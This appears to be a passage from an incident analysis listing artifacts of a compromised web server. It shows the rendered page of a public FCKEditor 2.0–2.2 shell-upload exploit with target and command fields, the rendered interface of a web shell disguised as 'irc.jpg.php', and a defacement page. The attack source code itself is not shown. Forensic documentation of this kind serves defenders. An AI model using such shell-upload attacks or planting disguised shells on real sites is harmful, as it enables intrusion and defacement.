{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body>
<p class="Stile6">
******* FCKEditor 2.0 <= 2.2 shell upload**************

<p class="Stile6">a
script by rgod at <a xhref="http://retrogod.altervista.org"target="_blank">
http://retrogod.altervista.org</a>
<table width="84%">
<tr>
<td width="43%"><form name="form1" method="post" action="/fckeditor.php"><input
type="text" name="host"> <span class="Stile5">* target (ex:www.sitename.com)
</span>

<input type="text" name="path"> <span class="Stile5">* path (ex:
/FCKEditor/ or just / ) </span>

<input type="text" name="cmd"> <span
class="Stile5"> * specify a command</span>

<input type="text" name="port">
...
truncated
...
# milw0rm.com [2006-02-09]
#####end of fckeditor.php.rendered SUCCESS


LISTING E:

#####begin irc.jpg.php rendered:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>VuRuCu TeaM-IRC v1</title>

<style type="text/css">
body { font: small sans-serif; text-align: center }
img { width: 17px; height: 13px }
a, a:visited { text-decoration: none; color: navy }
hr { border-style: none; height: 1px; background-color: silver; color: silver }
#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
#main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
.listing th, .listing td { padding: 1px 3pt 0 3pt }
.listing th { border: 1px solid silver }
.listing td { border: 1px solid #ddd; background: white }
.listing .checkbox { text-align: center }
.listing .filename { text-align: left }
.listing .size { text-align: right }
.listing .permission_header { text-align: left }
.listing .permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .functions { text-align: left }
.listing_footer td { background: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { background: #eee; border: 1px solid silver }
#upload { padding-top: 1em }
#create { padding-bottom: 1em }
.small, .small option { font-size: x-small }
textarea { border: none; background: white }
table.dialog { margin-left: auto; margin-right: auto }
td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
#permission { margin-left: auto; margin-right: auto }
#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
td.permission_action { text-align: right }
#symlink { background: #eee; border: 1px solid silver }
#symlink td { text-align: left; padding: 3pt }
#red_button { width: 120px; color: #400 }
#green_button { width: 120px; color: #040 }
#error td { background: maroon; color: white; border: 1px solid silver }
#notice td { background: green; color: white; border: 1px solid silver }
#notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
code { font-size: 12pt }
td { white-space: nowrap }
</style>

<script type="text/javascript">
<!--
function activate (name) {
if (document && document.forms[0] && document.forms[0].elements['focus']) {
document.forms[0].elements['focus'].value = name;
}
}
//-->
</script></head><body alink="black" bgcolor="#000000" link="white" text="red" vlink="blue">
<h1 style="margin-bottom: 0pt;">VuRuCu TeaM| IRC v1</h1>
<form enctype="multipart/form-data" action="irc.jpg.php" method="post">
<table id="main">
<tr>
<td colspan="7" id="directory"><a xhref="http://victim/me/myweb/zeh/irc.jpg.php?dir=%2Fwebroot%2Fme%2Fmyweb%2Fzeh%2F">Directory</a>:
<input name="dir" size="42" value="/webroot/me/myweb/zeh/" onfocus="activate('directory')" type="text">
<input name="changedir" value="change" onfocus="activate('directory')" type="submit"></td>
</tr>
<tr>
<td colspan="7" style="height: 1em;"></td>
</tr>
</table>
</form>
<!--webbot bot="HTMLMarkup" endspan -->&nbsp;<!--webbot bot="HTMLMarkup" startspan -->
<p align="center"><!--webbot bot="HTMLMarkup" startspan --><font face="Verdana"><center>
<h2><span id="lightf_light"></span></h2>
</center></font>
</body></html>
<html>
########end of irc.jpg.php rendered
LISTING F:
#####begin of defaced default.htm
<head>
<meta http-equiv="Content-Language" content="tr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Hacked by LORD // Turkish Hacker</title>
</head>

<body bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center"><font color="#00FF00" size="6" face="MS Serif">HACKED BY LORD</font></p>
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font face="MS Serif" size="6" color="#00FF00">Turkish Hacker</font></p>
</body>
</html>
#####end of defaced default.htm